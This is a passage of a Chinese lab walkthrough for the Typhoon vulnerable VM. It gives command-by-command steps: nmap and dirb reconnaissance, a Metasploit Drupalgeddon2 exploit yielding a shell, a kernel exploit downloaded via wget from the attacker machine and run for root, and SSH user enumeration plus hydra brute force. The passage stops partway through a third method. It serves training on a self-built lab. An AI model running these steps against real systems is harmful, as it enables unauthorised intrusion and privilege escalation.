红队渗透测试之Typhoon—通过十种不同方法拿下

2022-09-03|

该项目是PrismaCSI作者精心制作的项目环境,目标是获取获得root权限并找到flag.txt文本信息,该项目作为OSCP考试培训必打的一个项目环境,该作者评定该环境为渗透中级水准难度。接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该的技巧和文章都能学习到一些红队知识。

Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.

Typhoon虚拟机包含多个漏洞和配置错误。Typhoon可用于测试网络服务中的漏洞,配置错误,易受攻击的Web应用程序,密码破解攻击,权限提升攻击,利用后步骤,信息收集和DNS攻击。

该项目有始有终会用到信息收集->通过信息收集到的各种思路进行getshell->获得getshell(十种方式)->内网信息枚举->提权,最终拿到flag.txt的过程,那么在这当中用到了一些小技巧都会在文章中演示出来,希望大家能动手也来和我一起学习渗透。

请注意:

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

信息收集

渗透测试的本质就是信息收集,信息收集决定了你的攻击面的宽窄!

下面首先使用nmap进行信息收集

1. nmap扫描网段

由于本项目环境是nat模式需要项目IP地址,对IP网段进行全网段扫描

nmap 192.168.27.0/24 -sP

2. nmap全端口扫描

进行namp全端口服务枚举

nmap -p- 192.168.27.128 -A

可以看到开放了非常多的端口

nmap输出显示各种开放端口:21(ftp,可以匿名访问的)、22(ssh)、25(smtp)、53(domain)、80(http)、110(pop3)、111(rpcbind)、139(netbios-ssn)、 143(imap)、445(netbios-ssn)、631(ipp)、993(ssl/imaps)、995(ssl/pop3)、2049(nfs_acl)、3306(mysql)、5432(postgrespl)、8080(http) 、6379(redis)、27017(mongodb)

3. web目录枚举

dirb是一个基于字典的web目录扫描工具,查找现有的(和/或隐藏的)Web对象,通过对Web服务器发起基于字典的攻击并分析响应的数据。 采用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站,是在信息收集阶段获取目标信息常用工具手段。

这里我们使用dirb对目录进行爆破枚举

dirb http://192.168.27.128/

http://192.168.27.128/cms/

http://192.168.27.128/drupal/

http://192.168.27.128/phpmyadmin/

http://192.168.27.128/javascript/

http://192.168.27.128/robots.txt

通过dirb对目标网站进行扫描发现存在phpmyadmin以及robots.txt和drupal,cms等目录文件

攻击思路(一):drupal漏洞利用

msfconsole

使用msf进行漏洞利用

查找drupal模块

search drupal

有很多漏洞,尝试使用最新的2018年的exp

use exploit/unix/webapp/drupal_drupalgeddon2

填写攻击ip地址

set rhosts 192.168.27.128

这里注意扫描目录要修改一下

set TARGETURI /drupal
run

拿到一个反弹shell

/bin/bash -i

获取一个稳定shell

查看版本

uname -a

直接查找3.13.0

searchsploit 3.13.0

直接使用脚本

searchsploit -m linux/local/37292.c

将exp复制到当前目录,并开启http服务,将exp下载到目标机器

python -m SimpleHTTPServer 8080
wget http://192.168.27.187:8080/37292.c

编译并命名为ylion,授予ylion权限并运行

gcc 37292.c -o ylion
chmod +x ylion
./ylion

提权成功

成功拿到root权限!

攻击思路(二):SSH端口爆破

发现端口22开放,其版本为openssh 6.6.1p1

利用OpenSSH新爆出的CVE爆出目标主机的用户,这对特定的用户爆破密码,建议爆破1000条

searchsploit openssh

OpenSSH 2.3 < 7.7 - Username Enumeration

可以直接使用这个poc脚本进行攻击

只要在search里面能找到的exp或者poc,在msf里面都是有的

search ssh/ssh_

使用第六个

use auxiliary/scanner/ssh/ssh_enumusers
options

查看参数

set thosts 192.168.27.128

修改为攻击ip

将爆破字典放到桌面的目录下

并且写入参数中,如下

由于是爆破,把线程调为20

set threads 20

然后输入run开始运行

爆破完成,找到admin账户

使用九头蛇hydra对靶机的ssh进行爆破

hydra -l admin -P /root/Desktop/1/66/rockyou.txt 192.168.27.128 ssh

用户名为:admin 密码为:metallica

ssh [email protected]
metallica

ssh远程登录成功

查看sudo -l情况

可以直接提权

sudo bash

提权成功

攻击路径(三):phpMoAdmin

phpMoAdmin 是一个用PHP 开发的在线MongoDB 管理工具,可用于创建、删除和修改数据库和索引,提供视图和数据搜索工具,提供数据库启动时间和内存的统计,支持JSON 格式数据的导入导出。

从之前nmap扫描的数据可以看到如下

访问:http://192.168.27.128/robots.txt

访问/robots.


标签: 192.168 漏洞 使用 27.128 一个 端口 利用 可以 Typhoon 攻击
出处: https://www.freebuf.com/vuls/343103.html

文明发言,请先登录

文明上网理性发言,请遵守国家法律法规。

最新评论

©2003- 黑基网 黑名单存档手机版网站地图免责条款法律声明隐私保护